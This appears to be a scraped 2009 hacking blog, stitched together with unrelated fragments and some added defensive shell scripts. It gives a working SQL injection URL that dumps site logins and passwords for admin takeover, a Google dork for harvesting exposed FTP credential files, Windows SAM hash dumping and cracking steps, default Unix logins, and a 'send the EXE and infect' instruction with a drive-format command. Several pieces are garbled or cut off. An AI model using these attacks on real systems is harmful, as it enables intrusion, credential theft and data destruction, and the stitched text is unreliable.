Monday, 28 December 2009

Today we will look at the different ways to hack FTP sites. We will not cover advanced scripting for hacking FTP, because that will come in another post; in this part we will only discuss the simple ways you can use to hack FTP sites, the famous tricks that you may already know or will learn now. So let's start hacking.

What is FTP ?

FTP is the File Transfer Protocol, which is used to transfer files from one host to another.

FTP works on default port 21. When we scan any server or PC and get the result "21 port open", that is how we know that the FTP service is running on that particular server or PC.

In your default browser you can browse an FTP site by simply typing "ftp://ipaddress" or "ftp://domain", e.g. ftp://192.168.0.1 or ftp://this.com.

Hacking FTP

Sometimes when you use FTP sites you get access straight away, but most of the time when you open an FTP server, or open it from the command line, it will ask you for a user name and password.

Common way to get access.

The simplest way to get access to an FTP server is to use the anonymous FTP user name and password.

For that, type "anonymous" as the user name and "IE@user" as the password (some kind of email ID; it does not need to be your own or even a valid email address), and you will get access.

Ftp servers on internet.

Yes, there is a simple way to get the user names and passwords of the most-used servers on the internet.

For the following trick you need a tool called "Total-Commander-Password-Recovery", which you can download from the following site: www.reactive-software.com

You need the full version to perform the password hacking trick.

The second tool is google.com.

Now the fun begins.

Go to google.com in your browser.

In the search field type the following code, "intitle:index.of wcx_ftp.ini", and click Search.

Select a website where you see "wcx_ftp.ini" in the text.

From that directory, save the wcx_ftp.ini file to your computer.

Now open Total Commander and click on the "from file" option.

Select wcx_ftp.ini.

Then click on Recover password.

That's it. Look how many FTP server passwords you got from one ftp.ini file.
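The trick only works because somebody left a wcx_ftp.ini inside a directory the web server lists, so a site owner can run the same search against their own web root. This is an added example, not part of the original post: it finds any wcx_ftp.ini under a directory and lists which saved FTP logins need their passwords changed. The key names host, username and password are an assumption about the file layout, the function names are hypothetical, and the sample file is constructed.

```shell
#!/bin/sh
# Added example, not from the original post.
# Assumption: wcx_ftp.ini is an INI file whose connection sections hold
# host=, username= and password= keys. Stored passwords are never printed.

# list_stored_logins FILE -> "section<TAB>host<TAB>username" per saved password
list_stored_logins() {
    awk '
        function emit() {
            if (sect != "" && pass != "")
                printf "%s\t%s\t%s\n", sect, host, user
            host = ""; user = ""; pass = ""
        }
        { sub(/\r$/, "") }                      # file was written on Windows
        /^\[.*\]$/ { emit(); sect = substr($0, 2, length($0) - 2); next }
        {
            eq = index($0, "=")
            if (eq == 0) next
            key = tolower(substr($0, 1, eq - 1))
            val = substr($0, eq + 1)
            if (key == "host") host = val
            else if (key == "username") user = val
            else if (key == "password") pass = val
        }
        END { emit() }
    ' "$1"
}

# scan_webroot DIR -> "file<TAB>section<TAB>host<TAB>username", sorted by file
scan_webroot() {
    find "$1" -type f -iname 'wcx_ftp.ini' | sort | while IFS= read -r f; do
        list_stored_logins "$f" | while IFS= read -r login; do
            printf '%s\t%s\n' "$f" "$login"
        done
    done
}

# make_sample_webroot DIR: constructed sample data for the demo below
make_sample_webroot() {
    mkdir -p "$1/backup"
    printf '[connections]\r\n1=shop\r\n[shop]\r\nhost=ftp.example.test\r\nusername=webmaster\r\npassword=0123ABCD\r\n[mirror]\r\nhost=mirror.example.test\r\nusername=anonymous\r\n' \
        > "$1/backup/WCX_FTP.INI"
    echo '<html></html>' > "$1/index.html"
}

# Demo on the constructed sample: one login (section "shop") has a saved password.
demo_root=$(mktemp -d)
make_sample_webroot "$demo_root"
scan_webroot "$demo_root"
rm -rf "$demo_root"
```

Every login it reports should be treated as exposed: remove the file from the web root and change those FTP passwords.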

Monday, 26 October 2009

The first thing we want to know is whether in BT our HDD will appear as an "hda" or "sda" device, so we check with the command "dmesg | grep hda". This command will show which devices are mounted as hda; my HDD is mounted as hda1.

We need to mount this HDD, but first we need to load the fuse module with modprobe, so type the command "modprobe fuse".

To mount hda1 use the command "ntfsmount /dev/hda1 /mnt/hda1 -o force". We use the force option because sometimes the HDD has dirty sectors, and we are not able to mount it without "-o force".

Then type "mount" and we will see that hda1 is mounted at "/mnt/hda1" and has write permission.

Now we use bkhive with the command "bkhive /mnt/hda1/WINDOWS/system32/config/system anishsys.txt" (NOTE: Linux is case sensitive, so the word "WINDOWS" should be in caps.)

We use samdump2 to get the hashes from the SAM file with the command "samdump2 /mnt/hda1/WINDOWS/system32/config/SAM anishsys.txt > pass.txt" (NOTE: "WINDOWS" and "SAM" are in caps.)

So we have the hashes in pass.txt, and we can crack this hash file using John the Ripper.

First we need to copy the pass.txt file into the john directory, so use the command "cp pass.txt /pentest/passwords/jtr"

Then use this command to crack the hashes: "./john pass.txt"

That is how we can crack Windows hashes in just five minutes. But if the password follows a complex policy, it may be hard to crack with john, so we can use rainbow tables to crack passwords of up to 14 characters.

Sunday, 25 October 2009

BackTrack is the best Linux OS available for ethical hacking and penetration testing, because it comes with the most popular software, which we can use for hacking.

For that reason BackTrack has become popular with everyone who wants to learn or do hacking.

BackTrack 4 is a pre-release that has really good programs built in, but for customization we need to install BackTrack on our hard disk, so in this tutorial I will show you how to install BackTrack 4 on an HDD.

We use a virtual machine such as VMware for the installation, because Linux-based OSes have some hardware compatibility issues; in VMware we don't need an additional driver package for the installation.

Let's start the tutorial.

After booting from the BT4 live DVD you need to go to the GUI version of BackTrack, so type the command "startx".

When the GUI has started, open a terminal and type the command "ubiquity"; the installer will start.

The first page of the installer asks for your "Location", so select your region. Mine is India, so I need to select the city Kolkata, then click on "forward".

The second page of the installer asks about the "keyboard layout". By default USA is highlighted, but you can change it to a layout that suits you. Then click on "forward".

The third page is "Prepare disk space": choose "Guided - use all disk" with a size of 8 GB. BT4 needs 4 GB for a default installation, so use an 8 GB virtual HDD, because if we need to make modifications in future we will need some empty disk space.

Step five, "Who are you?", is the login information, so fill that in, but remember that the login name must be in lowercase (Linux doesn't support capital letters there), and for the password just use a single word like mine: I use login name = indian and password = 1. Look at the last line, "What is the name of this computer?"; it is really important because it will be shown after you log in, so I use "IndianBox". Then click on "forward".

Step seven, "Ready to Install", gives you brief details where you see the language, name, login name and location. Check whether that information is right for you; if you need to make changes click the Back button, or click Install to start the installation.

The installation will start; it automatically creates Ext3 partitions for boot, root and everything else.

When the installation is complete, click on "Restart now".

When restarting it will ask you "remove disk then press ENTER:"; just press the Enter key. Remember, when the system restarts, go to the boot menu and select boot from HDD so that BT4 starts from the hard disk.

At startup it will ask you for Login: enter your user name and password, like mine.

Code (red is what the screen shows, blue is the command I enter):

IndianBox login: indian
Password : 1 (you will not see the password as you type; just type the correct password and press the Enter key)

Install complete.

You will get the following prompt:

Code (red is what the screen shows, blue is the command I enter):

indian@IndianIndianBOX:-$

But there is a problem: I don't have full root access, so some of my programs will ask me to authenticate with the root password. I don't like any restrictions, so I always want to log in with the root account because it has full rights. So let's remove this user; next time we enter the root user name and password directly at login and get root access. That is why I chose a simple password for the indian user login, so we can simply remove it. So we start now.

After logging in as the indian user I type the following commands.

Code (red is what the screen shows, blue is the command I enter):

indian@IndianIndianBOX:-$sudo su
[ sudo ] password for indian:1 (you will not see the password as you type; just type the correct password and press the Enter key)
root@IndianBOX:/home/indian# passwd (this changes the root password; by default the root password is toor, so anyone can use it, and I change it for my safety)
Enter new UNIX password:(enter new password here)
Retype new UNIX password: (enter new password here again)
password: password update successfully
root@IndianBOX:/home/indian# exit
indian@IndianIndianBOX:-$ exit

(This is an alternative for you, but as I said, I don't want any restrictions, so I need to remove the user indian from my BT4; here are the commands.)

Code (red is what the screen shows, blue is the command I enter):

root@IndianBOX:~#userdel indian
root@IndianBOX:~# rm -rf /home/indian/ (done, I removed the indian user from BT4; now we will start the GUI with root)
root@IndianBOX:~# startx

Original post by Anish M (please give me credit if you use this post on another site)

Monday, 19 October 2009

I always hear people say that Linux is a very hard OS (operating system) to work on. But the truth is that Linux is simple if you know the Linux command line. Linux is a UNIX-based OS; here I show you some simple basic UNIX commands from a hacking angle, and hope that will clear up some of the basics of hacking a UNIX OS.

1. HOW TO TELL IF/IF NOT YOU ARE ON A UNIX SYSTEM: UNIX SYSTEMS ARE QUITE COMMON SYSTEMS ACROSS THE COUNTRY. THEIR SECURITY APPEARS AS SUCH:

LOGIN; (OR LOGIN;) PASSWORD:

NOTE: WHEN HACKING ON A UNIX SYSTEM IT IS BEST TO USE LOWERCASE BECAUSE THE UNIX SYSTEM COMMANDS ARE ALL DONE IN LOWERCASE.

2. LOGIN; IS A 1-8 CHARACTER FIELD. IT IS USUALLY THE NAME (I.E. ANISH OR INDIA) OF THE USER, OR INITIALS (I.E. M.ANISH OR L.INDIA). HINTS FOR LOGIN NAMES CAN BE FOUND TRASHING THE LOCATION OF THE DIAL-UP (USE YOUR CN/A TO FIND WHERE THE COMPUTER IS).

PASSWORD: IS A 1-8 CHARACTER PASSWORD ASSIGNED BY THE SYSOP OR CHOSEN BY THE USER.

COMMON DEFAULT LOGINS
--------------------------
LOGIN;    PASSWORD:
ROOT      ROOT,SYSTEM,ETC..
SYS       SYS,SYSTEM
TEST      TEST
UNIX      UNIX
BIN       BIN

IF YOU GUESS A LOGIN NAME AND YOU ARE NOT ASKED FOR A PASSWORD, AND HAVE ACCESS TO THE SYSTEM, THEN YOU HAVE WHAT IS KNOWN AS A NON-GIFTED ACCOUNT. IF YOU GUESS A CORRECT LOGIN AND PASSWORD, THEN YOU HAVE A USER ACCOUNT. AND, IF YOU GUESS THE ROOT PASSWORD, THEN YOU HAVE A "SUPER-USER" ACCOUNT.

3. ALL UNIX SYSTEMS HAVE THE FOLLOWING INSTALLED TO THEIR SYSTEM: ROOT, SYS, BIN, DAEMON, UUCP, ADM

ONCE YOU ARE IN THE SYSTEM, YOU WILL GET A PROMPT. COMMON PROMPTS ARE: $ % #

BUT CAN BE JUST ABOUT ANYTHING THE SYSOP OR USER WANTS IT TO BE.

4. THINGS TO DO WHEN YOU ARE IN: SOME OF THE COMMANDS THAT YOU MAY WANT TO TRY FOLLOW BELOW:

who is on (SHOWS WHO IS CURRENTLY LOGGED ON THE SYSTEM.)
ls -a (LIST ALL FILES IN CURRENT DIRECTORY.)
du -a (CHECKS AMOUNT OF MEMORY YOUR FILES USE; DISK USAGE)
cd name (NAME IS THE NAME OF THE SUB-DIRECTORY YOU CHOOSE)
cd (BRINGS YOUR HOME DIRECTORY TO CURRENT USE)
cat name (NAME IS A FILENAME EITHER A PROGRAM OR DOCUMENTATION YOUR USERNAME HAS WRITTEN)

5. MOST UNIX PROGRAMS ARE WRITTEN IN THE C LANGUAGE OR PASCAL SINCE UNIX IS A PROGRAMMERS' ENVIRONMENT. ONE OF THE FIRST THINGS DONE ON THE SYSTEM IS PRINT UP OR CAPTURE (IN A BUFFER) THE FILE CONTAINING ALL USER NAMES AND ACCOUNTS. THIS CAN BE DONE BY DOING THE FOLLOWING COMMAND:

CAT /ETC/PASSWD

IF YOU ARE SUCCESSFUL YOU WILL SEE A LIST OF ALL ACCOUNTS ON THE SYSTEM. IT SHOULD LOOK LIKE THIS:

ROOT:HVNSDCF:0:0:ROOT DIR:/:
ANISH:MAJDNFD:1:1:ANISH COOL:/BIN:/BIN/ANISH
INDIA::1:2:INDIA SMITH:/BIN:/BIN/INDIA

THE "ROOT" LINE TELLS THE FOLLOWING INFO:

LOGIN NAME = ROOT
HVNSDCF = ENCRYPTED PASSWORD
0 = USER GROUP NUMBER
0 = USER NUMBER
ROOT DIR = NAME OF USER
/ = ROOT DIRECTORY

IN THE ANISH LOGIN, THE LAST PART "/BIN/ANISH" TELLS US WHICH DIRECTORY IS HIS HOME DIRECTORY (ANISH).

IN THE "INDIA" EXAMPLE THE LOGIN NAME IS FOLLOWED BY 2 COLONS, THAT MEANS THAT THERE IS NO PASSWORD NEEDED TO GET IN USING HIS NAME.
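The two weaknesses this listing shows, a login with an empty password field and password hashes stored in a file every user can read, are what an administrator should check for on their own system. This is an added example, not part of the original text: it audits a passwd-format file and reports both. The function names are hypothetical and the sample file is constructed from the lines above plus three extra entries.

```shell
#!/bin/sh
# Added example, not from the original text.
# audit_passwd FILE prints one finding per line, in file order:
#   EMPTY <login>    second field is empty: the login needs no password
#   INLINE <login>   a password hash sits in the world-readable file itself
#   BADLINE <n>      line n has too few colon-separated fields
audit_passwd() {
    awk -F: '
        /^[ \t]*(#|$)/ { next }                 # skip comments and blank lines
        NF < 6         { printf "BADLINE %d\n", NR; next }
        $2 == ""       { printf "EMPTY %s\n", $1; next }
        # "x" means the hash is kept in a shadow file; a leading "*" or "!"
        # marks an account that cannot log in with a password
        $2 != "x" && $2 !~ /^[*!]/ { printf "INLINE %s\n", $1 }
    ' "$1"
}

# sample_passwd: constructed sample input (first three lines mirror the
# listing above, the rest show a shadowed entry, a locked entry, a bad line)
sample_passwd() {
    cat <<'EOF'
root:HVNSDCF:0:0:root dir:/:
anish:MAJDNFD:1:1:anish cool:/bin:/bin/anish
india::1:2:india smith:/bin:/bin/india
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
broken:line
EOF
}

# Demo on the constructed sample.
demo_file=$(mktemp)
sample_passwd > "$demo_file"
audit_passwd "$demo_file"
rm -f "$demo_file"
```

On a real system run it as audit_passwd /etc/passwd; any EMPTY or INLINE finding means the account needs a password set or the hashes moved to a shadow file.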

Sunday, 4 October 2009

Sometimes you want to change the administrator password of a PC on your network. You know the current password and want to renew it without going to that PC or taking a NetMeeting session; the following batch file will help you do that. Just copy the code below and paste it into Notepad.

code:

@echo off
title password chenger
COLOR 07
echo network administrator password renewer.
echo creator Anish M
echo http://www.webmasti.co.nr
echo hrrp://www.indianehacker.blogspot.com
REM ask for the target machine, the account and its current password
set /p ip=ENTER IP ADDRESS :
CLS
set /p user=ENTER USER NAME :
CLS
set /p pass=ENTER CURRENT PASSWORD :
CLS
REM ask for the new password and show what is about to change
ECHO PROVIDE NEW PASSWORD DETAILS
set /p pwd=ENTER NEW PASSWORD:
CLS
ECHO YOUR NEW PASSWORD FOR %IP% COMPUTER %user% IS %PWD%
COLOR 04
ECHO NOTE :PASSWORD WILL CHANGE FOR THE IP ADDRESS YOU PROVIDED.
ECHO ARE YOU WANT TO PROSEED
REM the answer typed here is used as the label name to jump to
SET /P Y= TYPE Y or N:
CLS
COLOR 07
GOTO %Y%

But this only works if the original motherboard and hard drive still work.

So put it back together. For newbies =>

1> go to control panel,
2> double-click the system icon,
3> go to hardware tab,
4> click device manager button.
5> find the IDE ATA/ATAPI CONTROLLERS and expand the tab.
6> not the primary or secondary controller,
7> but right-click the first controller.
8> choose update driver.
9> choose the option to install from a list or specific location.
a> click next. now choose the (don't search. I will choose the driver to install) option.
b> click next. now highlight the Standard Dual Channel Pci Ide Controller.
c> click next. the Standard controller will install.
d> now reboot. log in.

The standard controller is completely installed. You can now shut down the computer, remove your hard drive, and it will boot with the new motherboard. No dump error; it works fine with the new motherboard.

This definitely doesn't work on every single website, so please, please, please don't complain. This took a really long time to make, so please be happy.

Starting (must use Firefox)

1. Open Google
2. Type in

Code: "Powered by EasySiteNetwork /category.php "

When choosing a site to hack, make sure you don't choose one talking about the SQL injection; that won't get you anywhere. I found the site I'm going to use in this tutorial on page 8 of my Google search.

Exploit

1. Take a look at the URL box and make sure it says category.php somewhere in the link, otherwise this won't work.

This is the exploit:

Code: /category.php?catid=1+union+select+111,222,concat_ws(char(58),login,password,email),444+from+users/*

Starting from category.php, highlight the rest of the URL and replace it with the exploit code. OK, now press Enter and notice the changes to the page. The user information is set up like this: Username: Password: Email

NOTE: if there is more than one username and password, then it's most likely that the 2nd one is the admin account, but if there is only one username, then it of course is the only one displayed.

So in this situation the admin username is: 1stAngel and the password is: akhual

Now in order to log in to the admin control panel, we must add this extension to the original URL: /siteadmin/index.php

NOTE: Sometimes there is a popup to log in to the admin panel, that's okay too, but if it doesn't work, then just log in like any other user would on the home page.

Congrats, you are now logged into the admin control panel, do as you please. Also, if you find out the hosting the website is using, by typing in a false path, you can log in to their FTP.

Note: This information is for education purpose only
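On the server side this request stands out, because catid is meant to be a number and the value sent here is not. This is an added example, not part of the original post: it reads a web access log and flags category.php requests whose catid value is not numeric, tagging those that carry a UNION SELECT. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original post.
# flag_catid_probes LOGFILE prints "TAG<TAB>client<TAB>url" for requests to
# category.php whose catid value is not a plain number.
#   UNION       value contains "union select" once + and %20 are decoded
#   NONNUMERIC  any other non-numeric value
# Assumption: combined log format, with the request line in double quotes.
flag_catid_probes() {
    awk -F'"' '
    {
        split($1, pre, " "); client = pre[1]
        split($2, req, " "); url = req[2]
        q = index(url, "?")
        if (q == 0) next
        if (substr(url, 1, q - 1) !~ /\/category\.php$/) next
        n = split(substr(url, q + 1), kv, "&")
        for (i = 1; i <= n; i++) {
            if (tolower(kv[i]) !~ /^catid=/) continue
            val = tolower(substr(kv[i], 7))
            if (val ~ /^[0-9]+$/) continue      # the only legitimate shape
            gsub(/\+|%20|%09|%0a|%0d/, " ", val)
            tag = "NONNUMERIC"
            if (val ~ /union +(all +)?select/) tag = "UNION"
            printf "%s\t%s\t%s\n", tag, client, url
        }
    }' "$1"
}

# sample_access_log: constructed log lines (documentation IP ranges)
sample_access_log() {
    cat <<'EOF'
192.0.2.10 - - [28/Dec/2009:10:00:00 +0000] "GET /category.php?catid=3 HTTP/1.1" 200 5120
198.51.100.7 - - [28/Dec/2009:10:01:12 +0000] "GET /category.php?catid=1+union+select+111,222,concat_ws(char(58),login,password,email),444+from+users/* HTTP/1.1" 200 6032
198.51.100.7 - - [28/Dec/2009:10:01:40 +0000] "GET /category.php?catid=1%20UNION%20ALL%20SELECT%201 HTTP/1.1" 200 5120
203.0.113.5 - - [28/Dec/2009:10:02:03 +0000] "GET /category.php?page=2&catid=abc HTTP/1.1" 200 5120
192.0.2.10 - - [28/Dec/2009:10:03:00 +0000] "GET /index.php?q=union+select HTTP/1.1" 200 100
EOF
}

# Demo on the constructed sample: three of the five requests are flagged.
demo_log=$(mktemp)
sample_access_log > "$demo_log"
flag_catid_probes "$demo_log"
rm -f "$demo_log"
```

Detection only tells you the site was probed; the fix is for category.php to reject any catid that is not an integer and to pass it to the database as a bound parameter.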

Do not try it on your PC. Don't mess around; this is for educational purposes only.

Step 1.

Copy The Following In Notepad Exactly as it says

01001011000111110010010101010101010000011111100000

Step 2.

Save As An EXE Any Name Will Do

Step 3.

Send the EXE to People And Infect

OR

If you think you cannot format the C drive while Windows is running, try it and you will see. Anyway, here is some more so you can test on other drives; this is simple binary code:

format c:\ /Q/X -- this will format your drive c:\

The Corrupt AntiSpyware category contains the list of corrupt, rogue, fake, illegal, even harmful anti-spyware tools that cannot correctly detect and remove spyware or other parasites and therefore are totally ineffective and should NOT be purchased and used. Listed programs have been carefully tested by the 2-spyware.com research center and did not pass most of our tests. These so-called spyware removers are driven by SPAM or deceptive advertising, are illegitimate clones of each other, use incorrect pest detection techniques, produce false positives finding malicious programs even in completely clean systems or do not work properly at all. None of the corrupt anti-spyware tools can effectively fight against parasites, as most of them are made only to trick users in order to make money from them.

Each spyware remover in the category comes with a review describing its negative sides and the reason why it was added to the corrupt anti-spyware list. Published reviews also include program screenshots, highlighting its questionable behavior, produced false positives, made detection and removal mistakes, etc. We rate tested programs by giving them marks from 1 to 100. The lower the mark a spyware remover gets, the less effective it is. Please carefully read each review, pay attention to the rating mark a program got and read comments published by other visitors. This will help you to make a wise choice and learn more about your currently used anti-spyware program.

In the list of questionable tools we add potentially corrupt anti-spyware programs that were not tested by the 2-spyware.com research center for several reasons. Most of the listed products are discontinued, others do not have any free, demonstration or trial versions. Nevertheless, all the entries definitely are rogue, ineffective and even harmful. Reviews are based on information provided by reliable sources such as SpywareWarrior, Sunbelt Software, Eric L. Howes, Patrick M. Kolla and others.

If you need a legitimate and effective spyware remover, please visit the anti-spyware category, which contains the list of all known legitimate anti-spyware programs able to effectively detect and remove spyware or other parasites. Drop us a note if you have found a program which deserves to be listed in the list of corrupt anti-spyware tools.

A few seconds after saving this file, your antivirus should come up with a message that this file is an infected virus, asking permission for its deletion or cleaning. This file is safe and is not going to infect your computer in any way. It is a standard text developed by the European Institute for Computer Anti-virus Research (EICAR). Every antivirus is programmed to treat this file as a virus.

If your antivirus does not flag this file as a virus, a DOS window will appear on your screen with the text "EICAR-STANDARD-ANTIVIRUS-TEST-FILE". If this happens then you should probably find some other, up-to-date antivirus, as your PC might already be infected with viruses.

Sometimes when you try to open the registry you get the error message "Administrator Disable registry", even though you are the admin of that PC. It is caused by some virus; to enable the registry simply follow the steps. Copy and paste the code below into Notepad.

PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory

QGREP Search file(s) for lines that match a given pattern.

RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Read, Set or Delete registry keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files.
REPLACE Replace or update one file with another
RD Delete folder(s)
RDISK Create a Recovery Disk
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)

SC Service Control
SCHTASKS Create or Edit Scheduled Tasks
SCLIST Display NT Services
ScriptIt Control GUI applications
SET Display, set, or remove environment variables
SETLOCAL Begin localisation of environment changes in a batch file
SETX Set environment variables permanently
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SOON Schedule a command to run in the near future
SORT Sort input
START Start a separate window to run a specified program or command
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration

TASKLIST List running applications and services
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file

USRSTAT List domain usernames and last login

VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label

WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WMIC WMI Commands